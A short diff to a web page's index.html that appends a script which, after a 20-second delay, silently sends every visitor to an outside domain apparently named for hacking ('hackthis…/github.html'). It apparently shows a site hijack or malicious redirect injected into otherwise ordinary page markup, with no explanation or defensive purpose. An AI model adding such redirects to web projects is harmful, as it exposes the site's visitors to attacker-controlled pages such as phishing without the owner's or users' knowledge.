--- a/index.html
+++ b/index.html
@@ -63,3 +63,7 @@ img {
   </style>
 </span></span></div>
     <p></p><p></p>
+<script language = 'javascript'>
+  var delay = 20000;
+  setTimeout("document.location.href='https://hackthis.nightsoft.gq/github.html'", delay);
+</script>
